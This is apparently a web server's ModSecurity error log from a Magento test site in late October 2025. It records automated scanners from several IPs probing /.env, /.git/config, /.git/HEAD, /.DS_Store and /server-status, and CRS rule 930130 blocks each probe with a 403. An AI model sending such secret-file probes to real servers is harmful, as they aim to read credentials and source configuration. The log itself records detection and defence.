[Fri Oct 24 11:49:02.525575 2025] [:error] [pid 3722571] [client 143.110.213.72:34686] [client 143.110.213.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aPtLjlrRcczNxK1BTu5xHwAAACw"]
[Fri Oct 24 11:49:02.871082 2025] [:error] [pid 3723001] [client 143.110.213.72:34694] [client 143.110.213.72] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aPtLjnhDPNrJbMub4RfzGgAAAAA"]
[Fri Oct 24 11:49:02.871344 2025] [:error] [pid 3723001] [client 143.110.213.72:34694] [client 143.110.213.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aPtLjnhDPNrJbMub4RfzGgAAAAA"]
[Fri Oct 24 11:49:02.871541 2025] [:error] [pid 3723001] [client 143.110.213.72:34694] [client 143.110.213.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aPtLjnhDPNrJbMub4RfzGgAAAAA"]
[Fri Oct 24 12:19:17.252305 2025] [authz_core:error] [pid 3726509] [client 164.92.107.174:38904] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Oct 24 12:19:18.910095 2025] [:error] [pid 3727659] [client 164.92.107.174:38918] [client 164.92.107.174] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aPtSpn1MrI6RCQC36-v1FQAAAAY"]
[Fri Oct 24 12:19:18.910309 2025] [:error] [pid 3727659] [client 164.92.107.174:38918] [client 164.92.107.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aPtSpn1MrI6RCQC36-v1FQAAAAY"]
[Fri Oct 24 12:19:18.910497 2025] [:error] [pid 3727659] [client 164.92.107.174:38918] [client 164.92.107.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aPtSpn1MrI6RCQC36-v1FQAAAAY"]
[Fri Oct 24 12:19:19.419484 2025] [:error] [pid 3722555] [client 164.92.107.174:38928] [client 164.92.107.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aPtSp4BuZMvglL43JAxfwgAAABw"]
[Fri Oct 24 12:19:19.419710 2025] [:error] [pid 3722555] [client 164.92.107.174:38928] [client 164.92.107.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aPtSp4BuZMvglL43JAxfwgAAABw"]
[Fri Oct 24 12:19:19.419891 2025] [:error] [pid 3722555] [client 164.92.107.174:38928] [client 164.92.107.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aPtSp4BuZMvglL43JAxfwgAAABw"]
[Fri Oct 24 12:19:19.937788 2025] [:error] [pid 3722556] [client 164.92.107.174:38942] [client 164.92.107.174] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aPtSp44wJNhUhIt3vUHcugAAAB0"]
[Fri Oct 24 12:19:19.938004 2025] [:error] [pid 3722556] [client 164.92.107.174:38942] [client 164.92.107.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aPtSp44wJNhUhIt3vUHcugAAAB0"]
[Fri Oct 24 12:19:19.938179 2025] [:error] [pid 3722556] [client 164.92.107.174:38942] [client 164.92.107.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aPtSp44wJNhUhIt3vUHcugAAAB0"]
[Sun Oct 26 08:27:50.667503 2025] [:error] [pid 3774078] [client 45.148.10.165:58146] [client 45.148.10.165] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/"] [unique_id "aP3NdmbW90BqxZkCrIdr2wAAAAk"]
[Sun Oct 26 08:27:50.667723 2025] [:error] [pid 3774078] [client 45.148.10.165:58146] [client 45.148.10.165] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/"] [unique_id "aP3NdmbW90BqxZkCrIdr2wAAAAk"]
[Sun Oct 26 08:27:50.667880 2025] [:error] [pid 3774078] [client 45.148.10.165:58146] [client 45.148.10.165] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/"] [unique_id "aP3NdmbW90BqxZkCrIdr2wAAAAk"]
[Sun Oct 26 08:27:50.804137 2025] [:error] [pid 3774077] [client 45.148.10.165:58236] [client 45.148.10.165] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aP3NdgFRpoKdmUXlJht3yQAAAAg"]
[Sun Oct 26 08:27:50.804324 2025] [:error] [pid 3774077] [client 45.148.10.165:58236] [client 45.148.10.165] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aP3NdgFRpoKdmUXlJht3yQAAAAg"]
[Sun Oct 26 08:27:50.804475 2025] [:error] [pid 3774077] [client 45.148.10.165:58236] [client 45.148.10.165] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aP3NdgFRpoKdmUXlJht3yQAAAAg"]
[Sun Oct 26 08:52:16.188748 2025] [authz_core:error] [pid 3771488] [client 188.166.108.93:58634] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun Oct 26 08:52:16.600516 2025] [:error] [pid 3769905] [client 188.166.108.93:58664] [client 188.166.108.93] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aP3TMBLpsOpM82cROhVU1gAAAAE"]
[Sun Oct 26 08:52:16.600766 2025] [:error] [pid 3769905] [client 188.166.108.93:58664] [client 188.166.108.93] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aP3TMBLpsOpM82cROhVU1gAAAAE"]
[Sun Oct 26 08:52:16.600940 2025] [:error] [pid 3769905] [client 188.166.108.93:58664] [client 188.166.108.93] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aP3TMBLpsOpM82cROhVU1gAAAAE"]
[Sun Oct 26 08:52:16.706062 2025] [:error] [pid 3769906] [client 188.166.108.93:58672] [client 188.166.108.93] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aP3TMMn7rqYqbuISx_nKTgAAAAI"]
[Sun Oct 26 08:52:16.706291 2025] [:error] [pid 3769906] [client 188.166.108.93:58672] [client 188.166.108.93] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aP3TMMn7rqYqbuISx_nKTgAAAAI"]
[Sun Oct 26 08:52:16.706496 2025] [:error] [pid 3769906] [client 188.166.108.93:58672] [client 188.166.108.93] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aP3TMMn7rqYqbuISx_nKTgAAAAI"]
[Sun Oct 26 08:52:16.800472 2025] [:error] [pid 3769908] [client 188.166.108.93:58678] [client 188.166.108.93] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aP3TMLqPHHu0-kcf44XIEgAAAAQ"]
[Sun Oct 26 08:52:16.800732 2025] [:error] [pid 3769908] [client 188.166.108.93:58678] [client 188.166.108.93] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aP3TMLqPHHu0-kcf44XIEgAAAAQ"]
[Sun Oct 26 08:52:16.800909 2025] [:error] [pid 3769908] [client 188.166.108.93:58678] [client 188.166.108.93] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aP3TMLqPHHu0-kcf44XIEgAAAAQ"]
[Sun Oct 26 10:43:49.312735 2025] [authz_core:error] [pid 3775459] [client 139.59.132.8:33880] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun Oct 26 10:43:49.574313 2025] [:error] [pid 3769906] [client 139.59.132.8:33908] [client 139.59.132.8] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aP3tVcn7rqYqbuISx_nKWwAAAAI"]
[Sun Oct 26 10:43:49.574555 2025] [:error] [pid 3769906] [client 139.59.132.8:33908] [client 139.59.132.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aP3tVcn7rqYqbuISx_nKWwAAAAI"]
[Sun Oct 26 10:43:49.574708 2025] [:error] [pid 3769906] [client 139.59.132.8:33908] [client 139.59.132.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aP3tVcn7rqYqbuISx_nKWwAAAAI"]
[Sun Oct 26 10:43:49.634967 2025] [:error] [pid 3770246] [client 139.59.132.8:33914] [client 139.59.132.8] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aP3tVebSTlD0xztH0qwSywAAAAY"]
[Sun Oct 26 10:43:49.635170 2025] [:error] [pid 3770246] [client 139.59.132.8:33914] [client 139.59.132.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aP3tVebSTlD0xztH0qwSywAAAAY"]
[Sun Oct 26 10:43:49.635327 2025] [:error] [pid 3770246] [client 139.59.132.8:33914] [client 139.59.132.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aP3tVebSTlD0xztH0qwSywAAAAY"]
[Sun Oct 26 10:43:49.687275 2025] [:error] [pid 3778523] [client 139.59.132.8:33930] [client 139.59.132.8] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aP3tVb3h3Wq8zLIRaQF1IwAAAAA"]
[Sun Oct 26 10:43:49.687526 2025] [:error] [pid 3778523] [client 139.59.132.8:33930] [client 139.59.132.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aP3tVb3h3Wq8zLIRaQF1IwAAAAA"]
[Sun Oct 26 10:43:49.687723 2025] [:error] [pid 3778523] [client 139.59.132.8:33930] [client 139.59.132.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aP3tVb3h3Wq8zLIRaQF1IwAAAAA"]
[Tue Oct 28 12:19:57.846283 2025] [authz_core:error] [pid 3821072] [client 128.199.182.77:59216] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Tue Oct 28 12:20:00.964271 2025] [:error] [pid 3819782] [client 128.199.182.77:47020] [client 128.199.182.77] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQCm4HK1uhqb2Kc0XPArUwAAAAQ"]
[Tue Oct 28 12:20:00.964504 2025] [:error] [pid 3819782] [client 128.199.182.77:47020] [client 128.199.182.77] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQCm4HK1uhqb2Kc0XPArUwAAAAQ"]
